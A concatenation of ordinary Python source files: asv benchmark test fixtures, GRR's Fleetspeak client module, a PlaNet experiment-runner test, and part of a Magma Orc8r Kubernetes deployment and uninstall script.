fd.write(_hg_config)
self._repo = hglib.open(self.path.encode(sys.getfilesystemencoding()),
encoding=self.encoding)
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
date = "{0} 0".format(util.datetime_to_timestamp(date))
self._repo.commit(message.encode(self.encoding),
date=date.encode(self.encoding))
def tag(self, number):
self._fake_date += datetime.timedelta(seconds=1)
date = "{0} 0".format(util.datetime_to_timestamp(self._fake_date))
self._repo.tag(
['tag{0}'.format(number).encode(self.encoding)],
message="Tag {0}".format(number).encode(self.encoding),
date=date.encode(self.encoding))
def add(self, filename):
self._repo.add([filename.encode(sys.getfilesystemencoding())])
def checkout(self, branch_name, start_commit=None):
if start_commit is not None:
self._repo.update(start_commit.encode(self.encoding))
self._repo.branch(branch_name.encode(self.encoding))
else:
self._repo.update(branch_name.encode(self.encoding))
def merge(self, branch_name, commit_message=None):
self._repo.merge(branch_name.encode(self.encoding),
tool=b"internal:other")
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
log = self._repo.log(name.encode(self.encoding), limit=1)
if log:
return log[0][1].decode(self.encoding)
return None
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "default"
log = self._repo.log('sort(ancestors({0}), -rev)'.format(branch).encode(self.encoding))
return [entry[1].decode(self.encoding) for entry in log]
def get_commit_message(self, commit_hash):
return self._repo.log(commit_hash.encode(self.encoding))[0].desc.decode(self.encoding)
def copy_template(src, dst, dvcs, values):
for root, dirs, files in os.walk(src):
for dir in dirs:
src_path = join(root, dir)
dst_path = join(dst, relpath(src_path, src))
if not isdir(dst_path):
os.makedirs(dst_path)
for file in files:
src_path = join(root, file)
dst_path = join(dst, relpath(src_path, src))
try:
with io.open(src_path, 'r', encoding='utf-8') as fd:
content = fd.read()
except UnicodeDecodeError:
# File is some sort of binary file... just copy it
# directly with no template substitution
with io.open(src_path, 'rb') as fd:
content = fd.read()
with io.open(dst_path, 'wb') as fd:
fd.write(content)
else:
content = content.format(**values)
with io.open(dst_path, 'w', encoding='utf-8') as fd:
fd.write(content)
dvcs.add(dst_path)
def generate_test_repo(tmpdir, values=[0], dvcs_type='git',
extra_branches=(), subdir=''):
"""
Generate a test repository
Parameters
----------
tmpdir
Repository directory
values : list
List of values to substitute in the template
dvcs_type : {'git', 'hg'}
What dvcs to use
extra_branches : list of (start_commit, branch_name, values)
Additional branches to generate in the repository.
For branch start commits, use relative references, e.g.,
the format 'master~10' or 'default~10' works both for Hg
and Git.
subdir
A relative subdirectory inside the repository to copy the
test project into.
Returns
-------
dvcs : Git or Hg
"""
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
project_path = os.path.join(dvcs_path, subdir)
if not os.path.exists(project_path):
os.makedirs(project_path)
for i, value in enumerate(values):
mapping = {
'version': i,
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}".format(i))
dvcs.tag(i)
if extra_branches:
for start_commit, branch_name, values in extra_branches:
dvcs.checkout(branch_name, start_commit)
for i, value in enumerate(values):
mapping = {
'version': "{0}".format(i),
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}.{1}".format(branch_name, i))
return dvcs
def generate_repo_from_ops(tmpdir, dvcs_type, operations):
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
version = 0
for op in operations:
if op[0] == "commit":
copy_template(template_path, dvcs_path, dvcs, {
"version": version,
"dummy_value": op[1],
})
version += 1
dvcs.commit("Revision {0}".format(version), *op[2:])
elif op[0] == "checkout":
dvcs.checkout(*op[1:])
elif op[0] == "merge":
dvcs.merge(*op[1:])
else:
raise ValueError("Unknown dvcs operation {0}".format(op))
return dvcs
def generate_result_dir(tmpdir, dvcs, values, branches=None):
result_dir = join(tmpdir, "results")
os.makedirs(result_dir)
html_dir = join(tmpdir, "html")
machine_dir = join(result_dir, "tarzan")
os.makedirs(machine_dir)
if branches is None:
branches = [None]
conf = config.Config.from_json({
'results_dir': result_dir,
'html_dir': html_dir,
'repo': dvcs.path,
'project': 'asv',
'branches': branches or [None],
})
repo = get_repo(conf)
util.write_json(join(machine_dir, "machine.json"), {
'machine': 'tarzan',
'version': 1,
})
timestamp = datetime.datetime.utcnow()
benchmark_version = sha256(os.urandom(16)).hexdigest()
params = None
param_names = None
for commit, value in values.items():
if isinstance(value, dict):
params = value["params"]
result = Results({"machine": "tarzan"}, {}, commit,
repo.get_date_from_name(commit), "2.7", None)
value = runner.BenchmarkResult(
result=[value],
samples=[None],
number=[None],
errcode=0,
stderr='',
profile=None)
result.add_result({"name": "time_func", "version": benchmark_version, "params": []},
value, started_at=timestamp, ended_at=timestamp)
result.save(result_dir)
if params:
param_names = ["param{}".format(k) for k in range(len(params))]
util.write_json(join(result_dir, "benchmarks.json"), {
"time_func": {
"name": "time_func",
"params": params or [],
"param_names": param_names or [],
"version": benchmark_version,
}
}, api_version=2)
return conf
@pytest.fixture(scope="session")
def browser(request, pytestconfig):
"""
Fixture for Selenium WebDriver browser interface
"""
driver_str = pytestconfig.getoption('webdriver')
if driver_str == "None":
pytest.skip("No webdriver selected for tests (use --webdriver).")
# Evaluate the options
def FirefoxHeadless():
from selenium.webdriver.firefox.options import Options
options = Options()
options.add_argument("-headless")
return selenium.webdriver.Firefox(firefox_options=options)
def ChromeHeadless():
options = selenium.webdriver.ChromeOptions()
options.add_argument('headless')
return selenium.webdriver.Chrome(chrome_options=options)
ns = {}
six.exec_("import selenium.webdriver", ns)
six.exec_("from selenium.webdriver import *", ns)
ns['FirefoxHeadless'] = FirefoxHeadless
ns['ChromeHeadless'] = ChromeHeadless
create_driver = ns.get(driver_str, None)
if create_driver is None:
src = "def create_driver():\n"
src += textwrap.indent(driver_str, " ")
six.exec_(src, ns)
create_driver = ns['create_driver']
# Create the browser
browser = create_driver()
# Set timeouts
browser.set_page_load_timeout(WAIT_TIME)
browser.set_script_timeout(WAIT_TIME)
# Clean up on fixture finalization
def fin():
browser.quit()
request.addfinalizer(fin)
# Set default time to wait for AJAX requests to complete
browser.implicitly_wait(WAIT_TIME)
return browser
@contextmanager
def preview(base_path):
"""
Context manager for ASV preview web server. Gives the base URL to use.
Parameters
----------
base_path : str
Path to serve files from
"""
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
# Don't serve from cwd, but from a different directory
path = SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, path)
path = os.path.join(base_path, os.path.relpath(path, os.getcwd()))
return util.long_path(path)
httpd, base_url = create_httpd(Handler)
def run():
try:
httpd.serve_forever()
except:
import traceback
traceback.print_exc()
return
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
try:
yield base_url
finally:
# Stop must be run in a separate thread, because
# httpd.shutdown blocks until serve_forever returns. We don't
# want to block here --- it appears in some environments
# problems shutting down the server may arise.
stopper = threading.Thread(target=httpd.shutdown)
stopper.daemon = True
stopper.start()
stopper.join(5.0)
def get_with_retry(browser, url):
for j in range(2):
try:
return browser.get(url)
except TimeoutException:
time.sleep(2)
return browser.get(url)
@pytest.fixture
def dummy_packages(request, monkeypatch):
"""
Build dummy wheels for required packages and set PIP_FIND_LINKS + CONDARC
"""
to_build = [('asv_dummy_test_package_1', DUMMY1_VERSION)]
to_build += [('asv_dummy_test_package_2', ver) for ver in DUMMY2_VERSIONS]
tag = [PYTHON_VER1, PYTHON_VER2, to_build, HAS_CONDA]
with locked_cache_dir(request.config, "asv-wheels", timeout=900, tag=tag) as cache_dir:
wheel_dir = os.path.abspath(join(six.text_type(cache_dir), 'wheels'))
monkeypatch.setenv('PIP_FIND_LINKS', 'file://' + wheel_dir)
condarc = join(wheel_dir, 'condarc')
monkeypatch.setenv('CONDARC', condarc)
if os.path.isdir(wheel_dir):
return
tmpdir = join(six.text_type(cache_dir), "tmp")
if os.path.isdir(tmpdir):
shutil.rmtree(tmpdir)
os.makedirs(tmpdir)
try:
os.makedirs(wheel_dir)
_build_dummy_wheels(tmpdir, wheel_dir, to_build, build_conda=HAS_CONDA)
except:
shutil.rmtree(wheel_dir)
raise
# Conda packages were installed in a local channel
if not WIN:
wheel_dir_str = "file://{0}".format(wheel_dir)
else:
wheel_dir_str = wheel_dir
with open(condarc, 'w') as f:
f.write("channels:\n"
"- defaults\n"
"- {0}".format(wheel_dir_str))
def _build_dummy_wheels(tmpdir, wheel_dir, to_build, build_conda=False):
# Build fake wheels for testing
for name, version in to_build:
build_dir = join(tmpdir, name + '-' + version)
os.makedirs(build_dir)
with open(join(build_dir, 'setup.py'), 'w') as f:
f.write("from setuptools import setup; "
"setup(name='{name}', version='{version}', packages=['{name}'])"
"".format(name=name, version=version))
os.makedirs(join(build_dir, name))
with open(join(build_dir, name, '__init__.py'), 'w') as f:
f.write("__version__ = '{0}'".format(version))
subprocess.check_call([sys.executable, '-mpip', 'wheel',
'--build-option=--universal',
'-w', wheel_dir,
'.'],
cwd=build_dir)
if build_conda:
_build_dummy_conda_pkg(name, version, build_dir, wheel_dir)
def _build_dummy_conda_pkg(name, version, build_dir, dst):
# Build fake conda packages for testing
build_dir = os.path.abspath(build_dir)
with open(join(build_dir, 'meta.yaml'), 'w') as f:
f.write(textwrap.dedent("""\
package:
name: "{name}"
version: "{version}"
source:
path: {build_dir}
build:
number: 0
script: "python -m pip install . --no-deps --ignore-installed "
requirements:
host:
- pip
- python
run:
- python
about:
license: BSD
summary: Dummy test package
""".format(name=name,
version=version,
build_dir=util.shlex_quote(build_dir))))
conda = _find_conda()
for pyver in [PYTHON_VER1, PYTHON_VER2]:
subprocess.check_call([conda, 'build',
'--output-folder=' + dst,
'--no-anaconda-upload',
'--python=' + pyver,
'.'],
cwd=build_dir)
|
fleetspeak_client.py
|
#!/usr/bin/env python
"""Fleetspeak-facing client related functionality.
This module contains glue code necessary for Fleetspeak and the GRR client
to work together.
"""
import logging
import pdb
import platform
import queue
import struct
import threading
import time
from absl import flags
from grr_response_client import comms
from grr_response_client import communicator
from grr_response_core import config
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_core.lib.rdfvalues import protodict as rdf_protodict
from grr_response_proto import jobs_pb2
from fleetspeak.src.common.proto.fleetspeak import common_pb2 as fs_common_pb2
from fleetspeak.client_connector import connector as fs_client
# pyformat: disable
START_STRING = "Starting client."
# /grr_response_client/comms.py)
# pyformat: enable
# Limit on the total size of GrrMessages to batch into a single
# PackedMessageList (before sending to Fleetspeak).
_MAX_MSG_LIST_BYTES = 1 << 20 # 1 MiB
# Maximum number of GrrMessages to put in one PackedMessageList.
_MAX_MSG_LIST_MSG_COUNT = 100
# Maximum size of annotations to add for a Fleetspeak message.
_MAX_ANNOTATIONS_BYTES = 3 << 10 # 3 KiB
_DATA_IDS_ANNOTATION_KEY = "data_ids"
class FatalError(Exception):
pass
class GRRFleetspeakClient(object):
"""A Fleetspeak enabled client implementation."""
# Only buffer at most ~100MB of data - the estimate comes from the Fleetspeak
# message size limit - Fleetspeak refuses to process messages larger than 2MB.
# This is a sanity safeguard against unlimited memory consumption.
_SENDER_QUEUE_MAXSIZE = 50
def __init__(self):
self._fs = fs_client.FleetspeakConnection(
version=config.CONFIG["Source.version_string"])
self._sender_queue = queue.Queue(
maxsize=GRRFleetspeakClient._SENDER_QUEUE_MAXSIZE)
self._threads = {}
if platform.system() == "Windows":
internal_nanny_monitoring = False
heart_beat_cb = self._fs.Heartbeat
else:
# TODO(amoser): Once the Fleetspeak nanny functionality is
# production ready, change this to
# internal_nanny_monitoring=False
# heart_beat_cb=self._fs.Heartbeat
internal_nanny_monitoring = True
heart_beat_cb = None
# The client worker does all the real work here.
# In particular, we delegate sending messages to Fleetspeak to a separate
# threading.Thread here.
out_queue = _FleetspeakQueueForwarder(self._sender_queue)
worker = self._threads["Worker"] = comms.GRRClientWorker(
out_queue=out_queue,
heart_beat_cb=heart_beat_cb,
internal_nanny_monitoring=internal_nanny_monitoring,
client=self)
# TODO(user): this is an ugly way of passing the heartbeat callback to
# the queue. Refactor the heartbeat callback initialization logic so that
# this won't be needed.
out_queue.heart_beat_cb = worker.Heartbeat
self._threads["Foreman"] = self._CreateThread(self._ForemanOp)
self._threads["Sender"] = self._CreateThread(self._SendOp)
self._threads["Receiver"] = self._CreateThread(self._ReceiveOp)
def _CreateThread(self, loop_op):
thread = threading.Thread(target=self._RunInLoop, args=(loop_op,))
thread.daemon = True
return thread
def _RunInLoop(self, loop_op):
while True:
try:
loop_op()
except Exception as e:
logging.critical("Fatal error occurred:", exc_info=True)
if flags.FLAGS.pdb_post_mortem:
pdb.post_mortem()
# This will terminate execution in the current thread.
raise e
def FleetspeakEnabled(self):
return True
def Run(self):
"""The main run method of the client."""
for thread in self._threads.values():
thread.start()
logging.info(START_STRING)
while True:
dead_threads = [
tn for (tn, t) in self._threads.items() if not t.isAlive()
]
if dead_threads:
raise FatalError(
"These threads are dead: %r. Shutting down..." % dead_threads)
time.sleep(10)
def _ForemanOp(self):
"""Sends Foreman checks periodically."""
period = config.CONFIG["Client.foreman_check_frequency"]
self._threads["Worker"].SendReply(
rdf_protodict.DataBlob(),
session_id=rdfvalue.FlowSessionID(flow_name="Foreman"),
require_fastpoll=False)
time.sleep(period)
def _SendMessages(self, grr_msgs, background=False):
"""Sends a block of messages through Fleetspeak."""
message_list = rdf_flows.PackedMessageList()
communicator.Communicator.EncodeMessageList(
rdf_flows.MessageList(job=grr_msgs), message_list)
fs_msg = fs_common_pb2.Message(
message_type="MessageList",
destination=fs_common_pb2.Address(service_name="GRR"),
background=background)
fs_msg.data.Pack(message_list.AsPrimitiveProto())
for grr_msg in grr_msgs:
if (grr_msg.session_id is None or grr_msg.request_id is None or
grr_msg.response_id is None):
continue
# Place all ids in a single annotation, instead of having separate
# annotations for the flow-id, request-id and response-id. This reduces
# overall size of the annotations by half (~60 bytes to ~30 bytes).
annotation = fs_msg.annotations.entries.add()
annotation.key = _DATA_IDS_ANNOTATION_KEY
annotation.value = "%s:%d:%d" % (grr_msg.session_id.Basename(),
grr_msg.request_id, grr_msg.response_id)
if fs_msg.annotations.ByteSize() >= _MAX_ANNOTATIONS_BYTES:
break
try:
sent_bytes = self._fs.Send(fs_msg)
except (IOError, struct.error):
logging.critical("Broken local Fleetspeak connection (write end).")
raise
communicator.GRR_CLIENT_SENT_BYTES.Increment(sent_bytes)
def _SendOp(self):
"""Sends messages through Fleetspeak."""
msg = self._sender_queue.get()
msgs = []
background_msgs = []
if not msg.require_fastpoll:
background_msgs.append(msg)
else:
msgs.append(msg)
count = 1
size = len(msg.SerializeToBytes())
while count < _MAX_MSG_LIST_MSG_COUNT and size < _MAX_MSG_LIST_BYTES:
try:
msg = self._sender_queue.get(timeout=1)
if not msg.require_fastpoll:
background_msgs.append(msg)
else:
msgs.append(msg)
count += 1
size += len(msg.SerializeToBytes())
except queue.Empty:
break
if msgs:
self._SendMessages(msgs)
if background_msgs:
self._SendMessages(background_msgs, background=True)
def _ReceiveOp(self):
"""Receives a single message through Fleetspeak."""
try:
fs_msg, received_bytes = self._fs.Recv()
except (IOError, struct.error):
logging.critical("Broken local Fleetspeak connection (read end).")
raise
received_type = fs_msg.data.TypeName()
if not received_type.endswith("GrrMessage"):
raise ValueError(
"Unexpected proto type received through Fleetspeak: %r; expected "
"grr.GrrMessage." % received_type)
communicator.GRR_CLIENT_RECEIVED_BYTES.Increment(received_bytes)
grr_msg = rdf_flows.GrrMessage.FromSerializedBytes(fs_msg.data.value)
# Authentication is ensured by Fleetspeak.
grr_msg.auth_state = jobs_pb2.GrrMessage.AUTHENTICATED
self._threads["Worker"].QueueMessages([grr_msg])
class _FleetspeakQueueForwarder(object):
"""Ducktyped replacement for SizeLimitedQueue; forwards to _SenderThread."""
def __init__(self, sender_queue):
"""Constructor.
Args:
sender_queue: queue.Queue
"""
self._sender_queue = sender_queue
self.heart_beat_cb = lambda: None
def Put(self, grr_msg, block=True, timeout=None):
"""Places a message in the queue."""
if not block:
self._sender_queue.put(grr_msg, block=False)
else:
t0 = time.time()
while not timeout or (time.time() - t0 < timeout):
self.heart_beat_cb()
try:
self._sender_queue.put(grr_msg, timeout=1)
return
except queue.Full:
continue
raise queue.Full
def Get(self):
raise NotImplementedError("This implementation only supports input.")
def Size(self):
"""Returns the *approximate* size of the queue.
See: https://docs.python.org/2/library/queue.html#Queue.Queue.qsize
Returns:
int
"""
return self._sender_queue.qsize()
def Full(self):
return self._sender_queue.full()
|
test_running.py
|
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import pickle
import threading
import time
import numpy as np
import tensorflow as tf
from planet.training import running
class TestExperiment(tf.test.TestCase):
def test_no_kills(self):
tf.logging.set_verbosity(tf.logging.INFO)
basedir = os.path.join(tf.test.get_temp_dir(), 'test_no_kills')
processes = []
for worker_name in range(20):
processes.append(threading.Thread(
target=_worker_normal, args=(basedir, str(worker_name))))
processes[-1].start()
for process in processes:
process.join()
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/DONE'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/PING'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/started'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/resumed'))
self.assertEqual(0, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/failed'))
self.assertEqual(0, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/numbers'))
self.assertEqual(100, len(filepaths))
for filepath in filepaths:
with tf.gfile.GFile(filepath, 'rb') as file_:
self.assertEqual(10, len(pickle.load(file_)))
def test_dying_workers(self):
tf.logging.set_verbosity(tf.logging.INFO)
basedir = os.path.join(tf.test.get_temp_dir(), 'test_dying_workers')
processes = []
for worker_name in range(20):
processes.append(threading.Thread(
target=_worker_dying, args=(basedir, 15, str(worker_name))))
processes[-1].start()
for process in processes:
process.join()
processes = []
for worker_name in range(20):
processes.append(threading.Thread(
target=_worker_normal, args=(basedir, str(worker_name))))
processes[-1].start()
for process in processes:
process.join()
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/DONE'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/PING'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/FAIL'))
self.assertEqual(0, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/started'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/resumed'))
self.assertEqual(20, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/numbers'))
self.assertEqual(100, len(filepaths))
for filepath in filepaths:
with tf.gfile.GFile(filepath, 'rb') as file_:
self.assertEqual(10, len(pickle.load(file_)))
def _worker_normal(basedir, worker_name):
experiment = running.Experiment(
basedir, _process_fn, _start_fn, _resume_fn,
num_runs=100, worker_name=worker_name, ping_every=1.0)
for run in experiment:
for score in run:
pass
def _worker_dying(basedir, die_at_step, worker_name):
experiment = running.Experiment(
basedir, _process_fn, _start_fn, _resume_fn,
num_runs=100, worker_name=worker_name, ping_every=1.0)
step = 0
for run in experiment:
for score in run:
step += 1
if step >= die_at_step:
return
def _start_fn(logdir):
assert not tf.gfile.Exists(os.path.join(logdir, 'DONE'))
assert not tf.gfile.Exists(os.path.join(logdir, 'started'))
assert not tf.gfile.Exists(os.path.join(logdir, 'resumed'))
with tf.gfile.GFile(os.path.join(logdir, 'started'), 'w') as file_:
file_.write('\n')
with tf.gfile.GFile(os.path.join(logdir, 'numbers'), 'wb') as file_:
pickle.dump([], file_)
return []
def _resume_fn(logdir):
assert not tf.gfile.Exists(os.path.join(logdir, 'DONE'))
assert tf.gfile.Exists(os.path.join(logdir, 'started'))
with tf.gfile.GFile(os.path.join(logdir, 'resumed'), 'w') as file_:
file_.write('\n')
with tf.gfile.GFile(os.path.join(logdir, 'numbers'), 'rb') as file_:
numbers = pickle.load(file_)
if len(numbers) != 5:
raise Exception('Expected to be resumed in the middle for this test.')
return numbers
def _process_fn(logdir, numbers):
assert tf.gfile.Exists(os.path.join(logdir, 'started'))
while len(numbers) < 10:
number = np.random.uniform(0, 0.1)
time.sleep(number)
numbers.append(number)
with tf.gfile.GFile(os.path.join(logdir, 'numbers'), 'wb') as file_:
pickle.dump(numbers, file_)
yield number
if __name__ == '__main__':
tf.test.main()
|
MVC2_5G_Orc8r_deployment_script.py
|
#!/usr/bin/env python3
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys, getopt, shutil
import time, re, logging
import os, subprocess, fileinput
import webbrowser, socket
import threading, platform
#Initialize the lock
lock = threading.Lock()
#Dictionary to maintain k8s services whether they are Running or not
k8s_obj_dict = {}
#Get the Current Working Directory
CWD = os.getcwd()
#Path for Orc8r temperary files
ORC8R_TEMP_DIR = '/tmp/Orc8r_temp'
INFRA_SOFTWARE_VER = os.path.join(ORC8R_TEMP_DIR, 'infra_software_version.txt')
K8S_GET_DEP = os.path.join(ORC8R_TEMP_DIR, 'k8s_get_deployment.txt')
K8S_GET_SVC = os.path.join(ORC8R_TEMP_DIR, 'k8s_get_service.txt')
#Path for Orc8r VM temperary files
ORC8R_VM_DIR = '/tmp/Orc8r_vm'
K8S_GET_OBJ = os.path.join(ORC8R_VM_DIR, 'k8s_get_objects.txt')
#Path for Templates directory where all source yaml files present
TEMPLATES_DIR = os.path.join(CWD, '../helm/templates')
#Debian-9-openstack-amd64.qcow2 file
DEBIAN_QCOW2_FILE = os.path.join(TEMPLATES_DIR, 'debian-9-openstack-amd64.qcow2')
#Path for multus-cni home directory
MULTUS_DIR = os.path.join(TEMPLATES_DIR, 'multus-cni')
class Error(Exception):
"""Base class for other exceptions"""
pass
class NotInstalled(Error):
"""Raised when Installation not done"""
pass
def Code(type):
switcher = {
'WARNING' : 93,
'FAIL' : 91,
'GREEN' : 92,
'BLUE' : 94,
'ULINE' : 4,
'BLD' : 1,
'HDR' : 95,
}
return switcher.get(type)
#Print messages with colours on console
def myprint(type, msg):
code = Code(type)
message = '\033[%sm \n %s \n \033[0m' % (code, msg)
print(message)
#Executing shell commands via subprocess.Popen() method
def execute_cmd(cmd):
process = subprocess.Popen(cmd, shell=True)
os.waitpid(process.pid, 0)
#Checking pre-requisites like kubeadm, helm should be installed before we run this script
def check_pre_requisite():
#Setting logging basic configurations like severity level=DEBUG, timestamp, function name, line numner
logging.basicConfig(
format='[%(asctime)s %(levelname)s %(name)s:%(funcName)s:%(lineno)d] %(message)s',
level = logging.DEBUG)
uname = platform.uname()
logging.debug('Operating System : %s' % uname[0])
logging.debug('Host name : %s' % uname[1])
if os.path.exists(ORC8R_TEMP_DIR):
shutil.rmtree(ORC8R_TEMP_DIR)
os.mkdir(ORC8R_TEMP_DIR)
cmd = 'cat /etc/os-release > %s' % INFRA_SOFTWARE_VER
execute_cmd(cmd)
with open(INFRA_SOFTWARE_VER) as fop1:
all_lines = fop1.readlines()
for distro_name in all_lines:
if "PRETTY_NAME" in distro_name:
logging.debug("Distro name : %s" % distro_name.split('=')[1])
logging.debug('Kernel version : %s' % uname[2])
logging.debug('Architecture : %s' % uname[4])
logging.debug('python version is : %s' % sys.version)
try:
cmd = 'kubeadm version > %s' % INFRA_SOFTWARE_VER
out = os.system(cmd)
if out == 0:
myprint("GREEN", "kubeadm installed : YES")
with open(INFRA_SOFTWARE_VER) as fop2:
kubeadm_version = fop2.readline().split(' ')
logging.debug("%s %s %s" % (kubeadm_version[2].split('{')[1], kubeadm_version[3], kubeadm_version[4]))
else:
raise NotInstalled
except NotInstalled:
print("kudeadm is not installed")
myprint("FAIL", "kubeadm installed : NO")
try:
cmd = 'helm version > %s' % INFRA_SOFTWARE_VER
out = os.system(cmd)
if out == 0:
myprint("GREEN", "HELM installed : YES")
with open(INFRA_SOFTWARE_VER) as fop3:
helm_version = fop3.readline().split(',')
logging.debug("%s" % helm_version[0].split('{')[1])
else:
raise NotInstalled
except NotInstalled:
print("Helm is not installed")
myprint("FAIL", "HELM installed : NO")
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("BLUE", " installing kubevirt and cdi")
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
#Delete files if exits
def del_files(file):
if os.path.exists(file):
os.remove(file)
#Un-installing all the k8s objects and deleting the temperary files in the path /tmp/Orc8r_temp/
def un_install(pwd):
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("BLUE", " Uninstalling Orc8r monitoring stack ")
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("BLUE", "*****Trying to Un-install Helm Charts*****")
execute_cmd("helm uninstall prometheus stable/prometheus-operator --namespace kubevirt")
execute_cmd("kubectl delete -f $PWD/../helm/templates/monitoring.coreos.com_thanosrulers.yaml -n kubevirt")
execute_cmd("kubectl delete -f $PWD/../helm/templates/monitoring.coreos.com_servicemonitors.yaml -n kubevirt")
execute_cmd("kubectl delete -f $PWD/../helm/templates/monitoring.coreos.com_prometheusrules.yaml -n kubevirt")
execute_cmd("kubectl delete -f $PWD/../helm/templates/monitoring.coreos.com_prometheuses.yaml -n kubevirt")
execute_cmd("kubectl delete -f $PWD/../helm/templates/monitoring.coreos.com_podmonitors.yaml -n kubevirt")
execute_cmd("kubectl delete -f $PWD/../helm/templates/monitoring.coreos.com_alertmanagers.yaml -n kubevirt")
myprint("BLUE", "*****Trying to Cleanup the temporay files & Directories created as part of installation*****")
del_files(INFRA_SOFTWARE_VER)
del_files(K8S_GET_DEP)
del_files(K8S_GET_SVC)
if os.path.exists(ORC8R_TEMP_DIR):
shutil.rmtree(ORC8R_TEMP_DIR)
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("BLUE", " Orc8r monitoring stack Uninstalled successfully")
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
#Get magmadev VM IP
def get_magmadev_vm_ip():
cmd = "kubectl get vmi -n kubevirt | awk '{print $1, $4}'"
data = subprocess.Popen([cmd], stdout = subprocess.PIPE, stderr = subprocess.STDOUT, shell=True)
stdout, stderr = data.communicate()
vmi_list = stdout.strip().decode("utf-8").split("\n")
for vmi in vmi_list:
if "magmadev" in vmi:
return vmi.split(" ")[1]
#Deleting route information
def del_route(pwd):
myprint("WARNING", "*****Trying to Un-install all 3 magma Virtual Machines*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo route del -net 192.168.60.0 netmask 255.255.255.0 dev br0' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo route del -net 192.168.129.0 netmask 255.255.255.0 dev br1' /dev/null" % pwd
execute_cmd(cmd)
#Deleting iptables rules
def del_iptables(pwd):
myprint("BLUE", "*****Trying to delete iptables rules added as part of installation*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo iptables -D FORWARD -s 192.168.0.0/16 -j ACCEPT' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo iptables -D FORWARD -d 192.168.0.0/16 -j ACCEPT' /dev/null" % pwd
execute_cmd(cmd)
#Deleting 3 VMs magmatraffic, magmatest, magmadev
def del_vms():
myprint("BLUE", "*****Deleting Alertmanger configurations*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/endpoint.yml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/service.yml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/service_monitor.yml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/alert_rules.yml")
myprint("BLUE", "*****Revert the changes like remove magmadev VM IP from endpoint.yml, service.yml files*****")
MAGMA_DEV_VM_IP = get_magmadev_vm_ip()
os.chdir(TEMPLATES_DIR)
for line in fileinput.input("endpoint.yml", inplace=True):
if "ip" in line:
print(line.replace(MAGMA_DEV_VM_IP, "YOUR_MAGMA_DEV_VM_IP"))
else:
print(line)
for line in fileinput.input("service.yml", inplace=True):
if "externalName:" in line:
print(line.replace(MAGMA_DEV_VM_IP, "YOUR_MAGMA_DEV_VM_IP"))
else:
print(line)
os.chdir(CWD)
